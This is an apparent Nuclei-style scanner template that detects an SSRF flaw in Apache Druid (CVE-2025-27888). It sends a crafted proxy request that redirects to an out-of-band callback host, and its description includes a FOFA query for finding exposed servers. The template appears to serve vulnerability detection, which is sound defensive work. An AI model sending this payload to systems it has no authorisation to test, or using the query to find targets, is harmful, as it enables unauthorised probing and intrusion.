http:
    - matchers:
        - part: interactsh_protocol
          type: word
          words:
            - dns
      raw:
        - |
          GET /proxy/coordinator@{{interactsh-url}} HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
id: Apache-Druid-SSRF-CVE-2025-27888
info:
    author: Superhero
    description: |-
        fofa: title="apache druid"
        当使用 Druid 管理代理时，可以使用具有特制 URL 的请求将请求重定向到任意服务器。
    name: Apache Druid ssrf漏洞(CVE-2025-27888)
    reference:
        - https://mp.weixin.qq.com/s/hxWe2mRV8yNuYaWIXZj4Vg
    severity: high
    tags:
        - SSRF
